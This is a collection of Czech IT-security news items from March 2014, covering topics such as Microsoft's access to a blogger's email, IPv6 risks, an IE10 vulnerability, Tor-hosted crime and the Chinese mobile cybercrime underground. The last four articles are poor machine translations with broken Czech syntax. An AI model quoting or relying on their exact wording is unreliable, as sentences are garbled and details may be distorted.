Velké riziko však pro uživatele představují zejména aplikace umístěné mimo oficiální distribuční kanály. U aplikací umístěných na stránkách třetích stran lze předpokládat vyšší riziko, že půjde o škodlivé programy. Hlavně v současné době jde přitom o častý způsob šíření aplikací pro chytré brýle.
Nejlepší možnou ochranu je tak nyní stahovat aplikace pouze z obchodu MyGlass a být opatrní při používání aplikací z jiných úložišť.
Microsoft a spol. mohou číst vaše emaily
31.3.2014 Špionáž
Velcí provozovatelé internetových služeb si vyhrazují právo číst obsah uživatelských emailů v případě, že k tomu mají vážné důvody.
Případ propuštěného zaměstnance Microsoftu Alexe Kibkala, který s jistým francouzským blogerem sdílel kód Windows 8, Windows RT a interní Activation Server SDK, ukázal na zvláštní praktiky některých technologických gigantů. Microsoft totiž v rámci vlastního vyšetřování vstoupil do emailové schránky tohoto blogera a přečetl si jeho korespondenci s Kibkalem. Bloger používal službu Microsoftu Hotmail, která nyní funguje pod názvem Outlook.com.
Microsoft přitom jednal v souladu s vlastními pravidly. V těch se uvádí, že Microsoft může číst uživatelské emaily v případě, že tím chrání majetek společnosti. V případě emailové schránky francouzského blogera tomu tak bylo.
Microsoft však není jediný, kdo si vyhrazuje právo číst cizí komunikaci. Podobná zadní vrátka mají i v Applu, Yahoo nebo Googlu.
Yahoo po svých uživatelích požaduje souhlas s tím, že společnosti vědomě umožňují přístup do jejich emailové schránky a jejímu veškerému obsahu. Yahoo zde stejně jako Microsoft ještě dodává, že této možnosti využije pouze v nezbytných případech pro ochranu svých práv. Téměř identické znění mají v tomto bodě i pravidla Googlu a Applu.
Jediný, kdo se k možnosti číst cizí emaily vyjádřil, byl Microsoft. Yahoo, Apple a Google odmítli věc komentovat. Microsoft dokonce již stihl upravit svá pravidla tak, aby vstup do uživatelské schránky byl jen poslední možností.
Podle Charlieho Howea, ředitele společnosti Skyhigh Networks, která nabízí cloudové bezpečnostní řešení, je hlavní problém v tom, že jde v podstatě o legální aktivitu. Uživatelé se zpřístupněním vlastních dat souhlasí téměř u každé cloudové služby – ať už tak činí vědomě, či nikoliv. Platí totiž známé pravidlo, že pravidla téměř nikdo nečte.
Bývalý zaměstnanec Microsoftu zatčen, vyzradil firemní tajemství
31.3.2014 Špionáž
Známý portál Wzor.net je nedostupný jen den poté, co byl jeho autor Alex Kibkalo obviněn z krádeže obchodních tajemství a zmizel i jeho účet na sociální síti Twitter.
Není zatím jasné, zda mezi ukončením provozu Wzor.net a obviněním bývalého zaměstnance Microsoftu existuje nějaká spojitost. Podle testování Computerworldu je Wzor.net offline a nedostupný ze Spojených států, Velké Británie, Ukrajiny i České republiky. Aplikace, které testují, zda je daná webová stránka aktivní a běží (například Where´s It Up a Is It Down Right Now?), ukazují, že Wzor.net je offline po celém světě.
Twitterový účet Wzor.net zmizel z internetu ve čtvrtek ráno. „Omlouváme se, stránka neexistuje,“ uváděl Twitter při snaze o přistoupení k účtu. Ve středu ráno se objevily informace o tom, že byl zadržen Alex Kibkalo, ruský občan, který pracoval v libanonské pobočce Microsoftu. Mezi lety 2005 a 2010 pak pracoval v ruské divizi Microsoftu. Kibkalo byl obviněn z toho, že sdílel s nejmenovaným francouzským blogerem kód Windows 8, Windows RT a interní Activation Server SDK (software development kit). Francouzský bloger byl zatčen jen den po zadržení Kibkala a nyní je vyslýchán policejními složkami.
Wzor.net byla stránka v ruském jazyce známá tím, že na ní byly jako na jedné z prvních zveřejňovány informace o Windows a vývojářské verze tohoto operačního systému ještě před vydáním finálních verzí. Minulý měsíc se na tomto webu objevil jedna z prvních verzí systému Windows 8.1, který má Microsoft vydat 8. dubna. Policie se se soudním příkazem dostala do Hotmailu a logů rychlých zpráv Kibkala, z nichž vyplývá, že tento muž zpřístupnil francouzskému blogerovi i počáteční verze Windows 7 a Windows 7 SP1 několik měsíců před vydáním jejich finálních verzí.
Kibkalo pracoval v Microsoftu podle svého profilu na sociální síti LinkedIn sedm let od května 2005 do září 2012. Muž byl z Microsoftu vypovězen po skončení interního vyšetřování vedeného divizí v Microsoftu s názvem Trustworthy Computing Investigations (TWCI), v rámci nějž byly nalezeny e-maily blogerovi. Kibkalo s tímto mužem sdílel i aktivační kód SDK přes svůj účet na SkyDrive. Podle FBI Rus navíc spustil virtuální server na serveru Microsoftu tak, aby svá jednání skryl. Microsoft se k otázkám, zda je výpadek Wzor.net nějak spojen s případem Kibkala, zatím nevyjádřil. K případu Kibkala mluvčí Microsoftu pouze uvedla: „Ochranu našeho duševního vlastnictví bereme velmi vážně a příslušným vládním agenturám předáváme všechny potřebné podklady.“
Šifrování na Facebooku je stále omezené
31.3.2014 Zabezpečení
Uživatelé nemají příliš možností, jak chránit svou komunikaci před kyberzločinci a vládními odposlechy.
Facebook neustále pracuje na zlepšování bezpečnostních protokolů a šifrovacích metod. Součástí jeho boje proti vnějším útokům je například i štědrý program odměn pro jedince pátrající po bezpečnostních chybách Facebooku nebo používání protokolu HTTPS, jehož zásadním nedostatkem je však fakt, že dešifrování komunikace probíhá ještě na datovém centru a nikoliv až na uživatelském počítači.
Jako nejlepší způsob ochrany uživatelské komunikace se proto jeví tzv. end-to-end šifrování, u kterého do šifrované komunikace nevidí ani samotný Facebook. Společnost má však s tímto mechanismem dlouhodobě problém.
Podle bezpečnostního ředitele Facebooku Joea Sullivana nedošlo k nasazení technologie kvůli její velké složitosti. Pro průměrného uživatele je prý velmi obtížně komunikovat pomocí end-to-end šifrování. „Pokud end-to-end šifrování používáte v emailové komunikaci, pak víte, o čem mluvím,“ řekl Sullivan, který tak naráží na potřebu ruční výměny veřejného klíče mezi odesílatelem a příjemcem – zvlášť pro každou zprávu.
Pokud uživatelé Facebooku chtějí tento typ ochrany přesto využít, mají na výběr z několika aplikací třetích stran. Facebook se prý podle Sullivana snažil přijít s vlastním řešením, ale neúspěšně. Podpora cizích aplikací je tak zatím jediné, co může v této věci udělat.
Jednou z těchto aplikací je Pidgin, kterým lze šifrovat komunikaci vedenou přes vlastní aplikaci Facebooku Messenger. Možnost, že by end-to-end šifrování zakomponoval do Messengeru přímo Facebook, Sullivan nechtěl komentovat.
Zájem uživatelů o zabezpečení vlastní komunikace přitom v poslední době výrazně vzrostl. Velkým dílem o to zasloužila NSA se svým špehovacím programem, ale i jiné organizace vedoucí hromadné útoky na uživatelské soukromí.
Důležitost šifrování minulý týden zdůraznil také Edward Snodwden, který se na dálku zúčastnil konference SXSW v americkém Austinu. Protokoly používané na Facebooku, Googlu nebo ve Skypu podle něj stále nechávají uživatelská data napospas tajným službám, protože nevyužívají end-to-end šifrování.
Softwarově definovat už jde i bezpečnostní architektura
31.3.2014 Bezpečnost
Řešení Software-Defined Protection (SDP, softwarově definovaná ochrana) představil Check Point Software.
Podle něj jde o revoluční bezpečnostní architekturu, která usnadní ochranu v rychle se rozvíjejícím světě IT i hrozeb. Novinka představuje třívrstvou bezpečnostní architekturu složenou ze segmentů pro vynucování, kontrolu a správu.
Přitom se odděluje vrstva správy od vrstvy vynucování, což umožňuje nastavit robustní a spolehlivé body pro vynucování s aktualizací ochrany v reálném čase z kontrolní vrstvy.
SDP využívá pro okamžitou ochranu informace o hrozbách z e sítě svých senzorů a nabízí modulární správu a otevřenou strukturu řízení.
„Softwarově definovaná bezpečnostní architektura Check Pointu pomůže IT týmům lépe redesignovat zabezpečení podnikových sítí s ohledem na současné IT prostředí bez geografického omezení i s ohledem na dynamický svět hrozeb,“ charakterizuje novinku Charles Kolodgy, viceprezident pro výzkum v IDC.
„Existuje velké množství bezpečnostních produktů, které jsou ale spíše reaktivní a taktické povahy, než aby byly orientované architektonicky. V reakci na tuto mezeru jsme vyvinuli softwarově definovanou ochranu a poskytujeme organizacím agilní a zabezpečenou bezpečnostní infrastrukturu,“ dodává Amnon Bar-Lev, prezident společnosti Check Point.
Detekce chování odhalí nezvané hosty
31.3.2014 Bezpečnost
Své bezpečnostní portfolio rozšířilo Cisco o řešení Cognitive Threat Analytics, které vyvinula česká firma Cognitive Security, již Cisco před rokem koupilo.
Konkrétně jde o intuitivní cloudové bezpečnostní řešení, které se dokáže samo učit a ke zjišťování škodlivých jevů využívá behaviorální modelování a detekci anomálií v běžném provozu sítě. Podle výrobce tím zkracuje čas vedoucí k odhalení hrozeb působících uvnitř sítě.
Jako novou součást portfolia představilo Cisco také řešení Advanced Malware Protection (AMP), které původně vyvinula firma Sourcefire, již vloni Cisco také převzalo. Řešení se implementovalo do portfolia nástrojů Content Security pro zabezpečení webových, e-mailových a cloudových služeb.
AMP slouží k ochraně před pokročilými útoky a poskytuje neustálý monitoring i analýzy napříč sítí a ve všech fázích kybernetického útoku – před ním, během něj i po něm.
AMP i Cognitive Threat Analytics jsou k dispozici jako volitelný doplněk pro řešení Cloud Web Security. Nová řešení jsou podle výrobce efektivnější než dřívější přístupy zaměřené na vyhledávání vzorků konkrétních typů malwaru, jejichž vytvoření pro každý nový druh škodlivého kódu však může trvat řadu dní.
AMP například nabízí takové postupy jako zjišťování reputace souborů (analyzuje soubory probíhající sítí a uživateli poskytuje informace o tom, jaké soubory byly na základě nastavení zablokovány), dále sandboxing (pomáhá v izolovaném prostředí sledovat a pochopit chování malwaru) či retrospektivní analýzu souborů, jejíž pomocí se řeší situace, kdy soubory, které již prošly perimetrem, se považují za hrozbu.
Osobní údaje: Americké společnosti se bojí evropských pokut
31.3.2014 Bezpečnost
Ve středu odsouhlasený zákon na ochranu soukromí platí pro všechny firmy podnikající v evropském prostoru a pokuty budou opravdu bolet.
Evropský parlament vždy bral právo na ochranu soukromí vážně. Je to jedna z věcí, která jasně dělí EU a USA – zatímco v Evropě je chráněno obecnými zákony a směrnicemi a příliš na tom nemění žádná konkrétní forma komerčního vztahu mezi vlastníkem dat a jejich zpracujícím, ve Spojených státech jistota soukromí de facto končí s hranicemi vlastního domova a dále jsou chráněny jen konkrétní případy konkrétními zákony (respektive jich spletí, která se průběžně rozrůstá).
Samozřejmě v řadě případů (například při koupi letenek a cestování mezi kontinenty) je nezbytné informace sdílet a dochází ke konfliktům mezi různými pohledy na soukromí. Řeší to různé směrnice a regulace, jako je například Safe Harbor. Ovšem jak prozradil Edward Snowden, všechny podobné dohody byly v průběhu let zcela pošlapány. Evropskému parlamentu došla trpělivost a ve středu odhlasoval zákon s definovanou penalizací, která bude platit nejen pro firmy evropské, ale pro každého, kdo podniká v Evropské unii.
Zákon postihuje i transport dat mimo EU bez explicitního povolení nebo používání dat v rozporu s prohlášeními na korporátních webech. Úniky dat musí být hlášeny co nejrychleji, nejlépe do 24 hodin od jejich zjištění, a v případě, že se tak nestane, bude třeba odesílat zdůvodnění příslušným úřadům. Společnosti se budou muset přizpůsobit ve čtyřech klíčových oblastech.
Nejkonkrétnějším novinkou je vytvoření místa Data Protection Office, které je povinné pro všechny firmy s více než 250 pracovníky. Funkce DPO půjde nad rámec přehlížení problematiky, bude zřejmě muset ovlivňovat strategii během vývoje produktů. Doporučuje se vytvořit komisi a pracovní skupiny, které bude dohlížet na každou fázi vzniků produktů a služeb.
Podstatné je, že společnosti se nebudou muset přizpůsobovat jednotlivým národním regulátorům, i když ten místní bude jejich primárním kontaktem. Změny nepochybně zkomplikují nasazování technologií, jako jsou sociální sítě, či obecně cloudy, jejichž provozovatel bude muset získat povolení EU před tím, než uvolní osobní data občanů EU do jiné země. Řada pozorovatelů ze soukromého sektoru samozřejmě varuje před dopadem na kompetitivnost Evropy a na nezbytnost vyjasnění rozporů a nekonzistencemi zákonných úprav jako je Data Protection Regulation a ePrivacy Directive.
V každém případě především americké firmy vyjadřují své zděšení nad možnými pokutami, které mohou dosáhnout výše 100 milionů euro nebo 5 procent globálního ročního obratu, podle toho, co je větší.
Protokol IPv6 může přinést nové bezpečnostní problémy
31.3.2014 Bezpečnost
Americký National Institute of Standards and Technology (NIST) varuje před nepromyšleným přechodem z IPv4 na IPv6.
Řada vlád a jejich úřadů má velké zpoždění oproti vlastním termínům pro implementaci nového internetového protokolu IPv6. Přechod z IPv4 mohou blokovat i bezpečnostní oddělení, například pokud se řídí doporučením americké organizace NIST.
Samozřejmě nadále platí důvody k urychlenému přechodu na internetový protokol IPv6. Adresy IPv4 jsou jednotlivým poskytovatelům centrálně přiřazovány po velkých blocích, které se dále dělí mezi konkrétní zákazníky. To všem není zcela efektivní využití spojitého adresního prostoru a díky divokému růstu Internetu v předchozích letech hrozilo jeho bezprostřední vyčerpání. V případě IPv6 je množství možných adres o tolik větší, že jejich přidělování již nikdy problémem nebude.
Samozřejmě, jak se několikrát ukázalo, krize nedostatku adres IPv4 se několikrát odkládala. Jedním z důvodů je především omezení používání vnějších statických IP adres. V takových případech jsou skupiny zařízení skryté prostřednictvím techniky překladu adres ukryté za adresou jedinou a samy pro vzájemnou komunikaci používají typ adres určených pro privátní adresy, které lze používat ve více organizacích současně.
Typickým příkladem poskytovatelů internetu, kteří takto postupují, jsou mobilní operátoři. Ti provozují miliardy uživatelů, ale při tom je jejich spotřeba jedinečných adres minimální. Současně probíhají pokusy o jakousi burzu adresních bloků, které se ale příliš nerozšířily, protože znamenaly zbytečné komplikace pro operátory, kteří si stejně drží řadu adres v rezervě.
Úřad NIST svým varováním o potenciálních hrozbách spojených s IPv6 přechodu příliš nepomůže. Podle jeho pracovní skupiny většina vládních organizací používá sítě navržené pouze pro práci s IPv4 a běh obou generací protokolů současně je problematický. Současně bezpečnostní nástroje mají potíže chránit i zařízení IPv4 přes desetiletí, po které jejich výrobci sbírali zkušenosti. A existují oprávněné obavy, že řada útočníků experimentuje s novými typy útoků a čeká na okamžik přepnutí cílových sítí. Pravděpodobnost útoků je proto velmi vysoká. Dokumenty pracovní skupiny NIST dokonce citují důkazy, že útočníci našli způsoby, jak tunelovat ze sítí IPv4 do IPv6 se současným obejitím bezpečnostních opatření.
Představitelé bezpečnostních výrobců nesouhlasí. Například podle Microsoftu s protokolem IPv6 pracoval již systém Windows XP SP 2. V té době měl spíše formu doplňkového modulu, ale byl testován ve velkém množství prostředí a zařízení. Všechny moderní verze Windows již mají přepracovaný TCP-IP stack ve svých základech a jsou zcela připraveny na nasazování do moderních sítí a není třeba se ničeho obávat.
NIST ovšem nesouhlasí a doporučuje, aby veškerá komunikace přes IPv6 byla v sítích blokována, dokud nebudou implementovány adekvátní bezpečnostní protokoly. Existuje dostatečné množství malwaru, připraveného na útoky, který dosud není aktivní z jednoduchého důvodu – že sítě IPv6 prostě nejsou k dispozici.
Berners-Lee: Svobodný internet je důležitý. Občas.
31.3.2014 IT
Zakladatel webu, Tim Berners-Lee se ve středu zúčastnil na Redditu akce AMA (ask me anything – zeptejte se mě na cokoliv) a odpovídal i na otázky ohledně dohledu vlády nad internetem a DRM.
Akce byla součástí oslav čtvrtstoletí existence webu. V kontrastu s komentáři pro média jako CNN nebo The Guardian, kde prosazoval otevřený web, zaujal Berners-Lee na Redditu o něco konzervativnější postoj.
„Pokud nebudeme mít otevřený a neutrální internet, na který se můžeme spolehnout bez obav o to, co se děje na pozadí, nemůžeme mít otevřenou vládu, dobrou demokracii, zdravotní péči, ani propojené komunity a rozdílnost kultury,“ řekl magazínu Guardian. „Není naivní si myslet, že to můžeme mít, je však naivní myslet si, že můžeme jen sedět s rukama v klíně a všechno to získat.“
Nezávislý web
Po nezávislosti webu Berners-Lee volal i v podobném rozhovoru s CNN, na Redditu se však k situaci vyjádřil jinak. „Myslím, že nějaké monitorování internetu vládními agenturami bude potřebné v boji se zločinem,“ napsal. „Potřebujeme vynalézt systém, který tuto bezprecedentní sílu ovládá a vyvažuje, abychom byli schopni vyšetřovat a držet agentury, které se tím zabývají, odpovědné veřejnosti.“
DRM
Tato dvě tvrzení nejsou nutně vzájemně neslučitelná. Ale Berners-Lee byl znovu nucen obhájit svou podporu ochranu digitálního obsahu pomocí DRM. „Otázka DRM podle mě není tak jednoduchá. Lidé chtějí sledovat velké filmy a DRM je v mnoha ohledech přítěží, ale pokud používáte Netflix nebo jste si koupili DVD, je DRM součástí vašeho života. Souhlasím však, že je zákon o autorských právech, DMCA a CFAA silně nedokonalý a potřebuje opravit nezávisle, ale to je jiný problém než DRM.“
„Web je primárně neutrální nástroj pro lidstvo,“ napsal dále. „Když se na lidstvo podíváte, vidíte dobré i špatné, úžasné i hrozné. Mocný nástroj může být použit k dobru nebo ke zlu. Věci, které jsou opravdu špatné, jsou ilegální na webu stejně jako mimo něj.“
Berners-Lee také vyjádřil svůj kladný vztah k mikroplatbám, svým rodičům, nástrojům kontrolujícím pravopis a ke koťatům.
Chyba v IE odhalila mezery v aktualizačním systému Microsoftu
31.3.2014 Zranitelnosti
Rychlost, jakou kyberzločinci zneužili zranitelnosti objevené v IE v polovině února, ukazuje na nedostatky v aktualizačním mechanismu Microsoftu.
Na závažnou zranitelnost v prohlížeči Internet Explorer 10, která by případným útočníkům umožnila vzdálené spuštění škodlivého kódu na uživatelském zařízení, bezpečnostní výzkumníci poprvé upozornili 13. března poté, co si všimli napadení webu francouzské Asociace leteckých výrobců. Toto sdružení má přes 300 členů.
Asi týden po objevení chyby Microsoft uvolnil modul Fix It, který uživatelům poskytoval dočasnou ochranu před vydáním opravné aktualizace. Problém je podle analytiků v tom, že o těchto modulech ví jen málo uživatelů. Firmy samozřejmě mohly ještě provést přechod na novější IE 11, který danou zranitelnost neobsahuje, ovšem takové změny rozhodně nejsou pro firemní uživatele snadnou záležitostí.
Po svém zveřejnění se zranitelnost přirozeně dostala také do pozornosti internetových útočníků. Ti ji okamžitě začali využívat ke svým operacím. Podle bezpečnostní společnosti Websense se obětmi útoků stalo hned několik webových stránek. Mělo prý dojít k napadení stránek jisté japonské cestovní kanceláře, taiwanské školy či hongkongské univerzity. Rychlá reakce útočníků podle Websense ukazuje na jejich snahu bezpečnostní díru maximálně využít k rychlému obohacení.
Microsoft za svůj systém oprav obvykle ze strany bezpečnostních expertů sklízí pochvalu. Opravné aktualizace přináší pravidelně každý měsíc a v případě nouze i častěji. Například Oracle tak činí čtvrtletně a Cisco dokonce jen dvakrát do roka.
Podle některých expertů by se přesto v tomto směru dalo udělat více. Shodují se například v potřebě rychlejších aktualizačních cyklů. Zejména v případě IE by se prý mělo upustit od měsíčního cyklu a uvolňovat aktualizace co nejdříve po odhalení zranitelnosti.
S takovým řešením by však zase mohly mít některé společnosti problém. Pro ty by proto bylo vhodnější, aby vhodně zvolenými opatřeními zamezily v přístupu k citlivým datům prostřednictvím potenciálně zranitelného prohlížeče. Navíc ne každá zranitelnost je rizikem pro všechny – firmy se mohou po vyhodnocení zranitelnosti samy rozhodnout, jestli opravnou aktualizaci potřebují či nikoliv.
TOR hostí denně 900 anonymních služeb
31.3.2014 Bezpečnost | Kriminalita
Každý den probíhá v systému TOR (The Onion Router, tedy „cibulové směrování") na 900 skrytých služeb.
Vyplývá to z průběžné analýzy Kaspersky Lab. Aktivita kybernetického zločinu v systému TOR navíc narůstá.
TOR je primárně neomezený a volný systém fungující pomocí internetu, jehož uživatelé si vyměňují zprávy ve fórech, komunikují skrze textové služby a provádějí další, zdánlivě běžné, operace.
Podstatným rozdílem je ale to, že jim TOR umožňuje zůstat během všech aktivit zcela anonymními, nelze identifikovat jejich IP adresu a tím pádem určit, kdo reálně za činností stojí. Navíc tato služba poskytuje takzvané pseudodomény, které zabraňují jakémukoli zjištění osobních informací o uživateli.
V poslední době kybernetičtí zločinci začali TOR aktivně využívat k provozování malwarové infrastruktury. Analytici Kaspersky Lab například odhalili trojského koně Zeus s funkcemi TOR a také prvního mobilního trojského koně pro Android ChewBacca. Síť TOR má řadu zdrojů věnovaných právě malwaru – řídící (C&C) servery, správcovské panely apod. Tím je značně ztížena možnost jejich identifikace nebo eliminace, je obtížné dát ja na blacklist.
Apple aktualizoval whitepaper systému iOS
31.3.2014 iOS
Aktualizace dokumentu k iOS odhaluje detailní informace o propracované bezpečnostní architektuře systémů zařízení iPhone a iPad.
33stránkový whitepaper nazvaný iOS Security byl vydán v únoru 2014 a je nyní k dispozici online (ve formátu PDF). Předchozí verze je datována do listopadu 2012, přibližně do doby, kdy firma Apple začala bezpečnosti věnovat zvýšenou pozornost. Nový dokument detailně popisuje nové bezpečnostní funkce, které byly uvedeny do systémů iOS, především verze 7: Snímač otisků prstů Touch ID, integrace jednotného přihlášení do korporátních aplikací a služeb, zabezpečení spojení konektivity Airdrop (ať už Wi-Fi nebo Bluetooth), iCloud Keychain pro generování a správu silných hesel a v neposlední řadě Secure Enclave, bezpečnostní koprocesor integrovaný do 64bitového procesoru Apple A7.
Whitepaper je podle bezpečnostních konzultantů zásadní změnou v přístupu Applu a jak říká Rich Mogull: „Obsahuje více informací o bezpečnosti iOS, než kdy Apple oficiálně uvolnil. Studiem tohoto dokumentu strávíme měsíce.“ Z tohoto pohledu se Apple donedávna choval jako Microsoft před deseti lety, kdy bylo zvykem uveřejňovat co nejméně informací o bezpečnostních standardech.
Detaily bezpečnostní architektury Apple, včetně její certifikace podle normy FIPS 140-2, nepochybně dále pomohou otevírat dveře do vládních agentur nebo korporací s extrémními bezpečnostními požadavky. „Řada profesionálů dosud nepovažovala produkty Apple za dostatečně zralé pro korporátní či státní bezpečnost, ale Apple se možná pomalu stává standardem v mobilní bezpečnosti. Již nyní jsou možná zařízení Apple zabezpečenější než jakékoli jiné běžně dostupné zařízení.“
To ale neznamená, že neexistuje spousta prostoru pro zlepšení, jak to ukázala poslední bezpečnostní konference RSA, kde bylo předvedeno několik způsobů, jak se mohou aplikace běžící na pozadí nerootovaného iPhonu dostat například ke všem dotekům na obrazovce a fungovat tedy jako typický keylogger. To představuje chybu spíše systémové architektury než autorů jednotlivých aplikací, i když na ty vina za bezpečnostní nedostatky nejčastěji padá. Na analýzu bezpečnostních slabin aplikací dostupných pro iOS se zaměřil výzkum firmy HP publikovaný v listopadu 2013. Testováno bylo více než 2000 mobilních aplikací používaných 600 velkými korporacemi v 50 zemích světa a jak se ukázalo, 90 procent z nich vykazovalo nějakou bezpečnostní slabinu či chování, od nepoužívání šifrování po data ukládaná v zařízení nebo dokonce přenášená po internetu.
HTTPS nelze věřit zakrýt vlastní on-line aktivity
11.3.2014 Bezpečnost
HTTPS byl původně použit k prokázání uživatelům internetu, že web a webový server, s nimiž komunikují jsou skutečně ty, které chtějí komunikovat s, ale později toto použití bylo rozšířeno k udržení uživatel komunikace, identity a prohlížení webových stránek v soukromí.
Ale skupina vědců se, bohužel, ukázalo, že HTTPS je mizerný soukromí nástroj, a že každý, kdo může prohlížet, nahrávat a analyzovat provoz návštěvníků lze identifikovat - s přesností 89 procent - na stránky, které jste navštívili a osobní údaje, které mají sdílené. skupina složená z vědců z UC Berkeley a Intel Labs je zachycen provoz návštěvníků na deset populární zdravotní péči (Mayo Clinic, Plánované rodičovství, Kaiser Permanente), financí (Wells Fargo, Bank of America, Vanguard), právních služeb (ACLU, Právní zoom) a streaming videa (Netflix, YouTube), webové stránky. "Náš útok se týká sdružování techniky identifikovat vzory v provozu. jsme pak použijte Gaussovo rozdělení určit podobnosti ke každému clusteru a mapových vzorků dopravních do pevné šířky reprezentace kompatibilní s širokým Rozsah strojového učení techniky. Vzhledem k podobnosti s přístupem Bag-o-slov dokumentovat klasifikace, naleznete na technice jako Bag-of-gaussovských rozostření (bog), "vysvětlili v whitepaper . "Tento přístup nám umožňuje identifikovat konkrétní stránky v rámci webové stránky, i když stránky mají podobnou strukturu a sdílené prostředky. " závislosti na webové stránky, které interagují s, tento typ útoku může mít mnoho důsledků pro uživatele internetu, jak detaily, jako jsou zdravotní stavy, které mají nebo léčebných postupů, které mají nebo uvažujete o nutnosti může být odhalen, právní problémy, které mají a mohou být zobrazeny akce, které může trvat, a finanční produkty, které používají a videa, které sledují mohli poukázat na informace, které by chtěl být skryté od nikoho jiného než sami sebe. Kdo může využít takový útok? No, každý, kdo má přístup k těmto webových stránkách a můžete zachytit provoz obětí -. V praxi to znamená, že poskytovatelé internetových služeb (ať už pracují pro vládu, nebo ne), zaměstnavatelé sledování online aktivity svých zaměstnanců, a zpravodajské agentury Naštěstí, oni si mysleli, z několika obranných technik, které, pokud by byla provedena, mohou výrazně snížit přesnost takového útoku. Také, oni poukázal, existují i jiné věci, které mohou mít vliv na účinnost útoku je. "K dnešnímu dni, všechny přístupy předpokládat, že oběť prochází web v jedné kartě, a že po sobě jdoucí načtení stránky lze snadno vymezeny. Budoucí práce by měla zkoumat skutečné uživatel praxe v těchto oblastech a vliv na výsledky analýzy. Například, zatímco mnoho uživatelů má více otevřených záložek najednou, to je jasné, jak velký provoz karta generuje jednou stránka je provedeno načtení. Kromě toho, že nevíme, jak snadno provoz z samostatné stránce zatížení může být vymezena s ohledem souvislý proud uživatelský provoz, "oni si všimli. "Konečně, naše práce předpokládá, že oběť skutečně odpovídá struktuře odkaz na webové stránky. V praxi to může být možné vyhovět uživatelům, kteří nepřilne k nosné konstrukci odkaz. "
Počítačoví zločinci stále více přitahuje Tor anonymity a skrytých služeb
11.3.2014 Kriminalita
Původně vytvořen s cílem pomoci političtí disidenti obejít omezení provozu a skrýt své online aktivity z autoritářských vlád, anonymita sítě Tor již dávno stal skvělý nástroj pro počítačové podvodníci skrýt své trestné činnosti a infrastrukturu. "I když infrastruktura Tor a cybercriminal zdroje nejsou ve stejném rozsahu jako konvenční internetu, se nám podařilo najít přibližně 900 skryté služby on-line v současné době, "Kaspersky Lab expert Sergey Lozhkin sdíleny v nedávném blogu. "Tam jsou také cca 5500 uzly celkem a 1000 výstupních uzlů, ale možnost vytvoření anonymní a zneužívání bez podzemní fórum, na trhu nebo malware C & C serveru je přilákat více a více zločinců k síti Tor. " Tor je ideálním místem pro skrytí škodlivý infrastrukturu v podobě skrytých služeb . Tu a tam výzkumníci bezpečnostní objevovat nové trestné činnosti pomocí Tor hostit C & C serverům své malware kontakty pro instrukce ( Chewbacca POS Trojan , Torec Android Trojan ., atd.) Takové C & C servery mají řadu výhod: je těžké objevit a vypnout , stejně jako těžké blacklist. Tor se také stala skvělým úkrytem pro podzemní trhy, které se zabývají v nelegálních předmětů. Silk Road se, na nějaký čas, se stal synonymem pro tyto trhy, ale od té doby svého vzniku, a to zejména po jeho takedown orgány Spojených států, nesčetné množství dalších se objevovaly jako houby po dešti, a svým zákazníkům i nadále nabízet a kupovat drogy , zbraně, malware, padělky, nelegální služby, ukradl osobní a finanční údaje, a tak dále (klikněte na screenshotu pro zvětšení): Konečně, vše, co "vydělal" peněz musí být prány předtím, než skončí v rukou zlodějů . A opět, Tor je ideální místo, jak to udělat, protože nabízí služby užitečné Bitcoin s praním špinavých peněz. "Počítačoví zločinci mohou vytvořit účet, depozitní bitcoins a budou rozděleny do různých veličin, přenesena přes desítky různých peněženek, aby jakékoliv vyšetřování velmi složité, "poznamenal Lozhkin.
Nahlédnout do Číny rychle se rozvíjející mobilní cybercriminal podzemí
11.3.2014 Mobil
Cybercriminal podzemní trh Každá země má odlišné vlastnosti, a 500 milionů národních uživatelů mobilního internetu a číslo neustále roste, čínská podzemní trh je zaplaven s počítačoví podvodníci nákup a prodej služby a zařízení, zaměřené na využití z nich. Vědci senior hrozeb společnosti Trend Micro Lion Gu byl čisticí fóra, internetové obchody a QQ chaty, aby nám o tom, co se vlastně děje na tomto rychle se rozvíjejícím mobilním podzemí. Mobilní aplikace, které tajně objednat uživatelům nejnovějších služeb jsou, přirozeně, velmi oblíbený u kybernetických podvodníků v Číně ve zbytku světa. Premium servisní čísla lze také zakoupit na podzemních trzích. Síťové dopravci obvykle přiřadit čísla prémiové služby kvalifikovaných poskytovatelů služeb, ale samozřejmě některé z nich nejsou nepříznivé jejich prodeje na zločince. Dalším typem škodlivého SMS odesílání aplikací jsou tzv. SMS spedice - aplikace, které textové zprávy zachytit nesoucí citlivé údaje a předá ji podvodníci. Tyto zprávy zahrnují ty s resetem hesla, ověřování kódů, atd. "jako prémie služeb zneužívají, ale také odstranit textové zprávy zachycují skrýt stopy infekce. Pokud se zločinci sehnat uživatelská jména obětí v určitých místech, mohou snadno měnit hesla a převzít kontrolu nad ukradených účtů, "Gu upozorňuje . Dále jsou SMS a iMessage spam software a zařízení. Tento typ spamu obvykle přináší nežádoucí a pricy nabídky zboží a služeb, jakož i vede uživatele na stránky hosting malware nebo phishing formy. rozesílat spamy v obrovských počtech, mohou podvodníci koupit a používat řadu různých zařízení. GSM modemy mohou i odesílat a přijímat textové zprávy, a fungují jako normální mobilní telefon. Stačí vložit SIM kartu (nebo více), a můžete se do toho. Stačí jít dát představu: 16-slot (se SIM kartou v každé) GSM modem můžete posílat 9.600 textových zpráv za hodinu.
Internet krátkých textových zpráv brány může dělat to ještě rychleji. Tato zařízení jsou obvykle poskytovány na poskytovatele služeb o mobilních operátorů sítí, ale může být samozřejmě zneužity počítačovými podvodníky stejně. SMS server - také známý jako "falešné základnové stanice" - je frekvence hardware rádio, které můžete posílat softwarové definované rádiové signály ve frekvenčních pásmech GSM. "Při spuštění, SMS server oznamuje sebe jako základnové stanice zasláním high-power signál, který nutí všechny v okolí mobilní telefony odpojit od oprávněných základnových stanic svých síťových dopravců, a místo toho se připojit k serveru SMS . SMS server pak může vystrčit spam do mobilních telefonů, "vysvětluje Gu." Po dokončení se SMS serveru odpojí od mobilních telefonů, které jsou pak přepojených jejich oprávněným základnových stanic. " iMessage spam počítačový software najde telefonní čísla vázány na Apple zařízení a odesílá zprávy k ní. Telefonní číslo, skenování služby jsou také populární SMS spammeři, kteří nechtějí ztrácet čas a úsilí zasláním spamu na čísla, která jsou dočasně nebo už ne v použití. Konečně, tam jsou služby, které nabízejí ke zvýšení hodnosti škodlivých aplikací na App obchodech třetích stran, které jsou dominantní v Číně. Všechny z těchto zařízení a služby přicházejí za cenu, a můžete se podívat na typické ceníky na Gu je whitepaper .
Cybersecurity se týká stává problémem zasedací místnost
11.3.2014 Bezpečnost
